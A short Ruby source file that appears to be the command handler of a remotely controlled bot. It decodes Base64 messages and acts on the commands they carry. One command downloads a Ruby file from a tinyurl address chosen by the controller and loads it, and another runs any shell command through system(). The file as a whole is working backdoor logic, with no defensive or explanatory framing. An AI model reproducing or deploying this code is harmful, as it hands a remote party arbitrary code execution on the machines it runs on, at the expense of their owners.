require 'digest/sha1'
require 'base64'

# can't use constant as it gets redeclared when the require is done and so causes a warning
@dynamic_file_name="encoded"

def process_message message, verbose=false
	if verbose
		puts "Using language file encoded"
		puts "Processing message: " + message
	end

	if /^xx([a-zA-Z0-9+\/=]*)$/.match(message)
		enc_message = $1
		dec_message = Base64.decode64(enc_message)

		puts "Decoded message is "+dec_message
		if /^([a-z]*) (.*)$/.match(dec_message)
			command=$1.strip
			arguments=$2.strip

			if verbose
				puts "command: " + $1 + " args: " + arguments
			end
			case command
				when "language"
					if verbose
						puts "using new language file " + arguments
					end
					filename = Digest::SHA1.hexdigest(Time.now.to_s) + ".rb"
					url="http://tinyurl.com/"+arguments
					puts "downloading "+url
					if download_file url, filename
						require filename
						puts "Now using dynamic file " + @dynamic_file_name
					else
						puts "Download failed"
					end
				when "ping"
					ping arguments, verbose
				when "get"
					get_file arguments, verbose
				when "exec"
					if arguments!=""
						arguments.gsub!(/&amp;/, "&")
						if verbose
							puts "executing command - " + arguments
						end
						system(arguments)
					end
				else
					puts "Unknown command"
			end
		end
	end
end
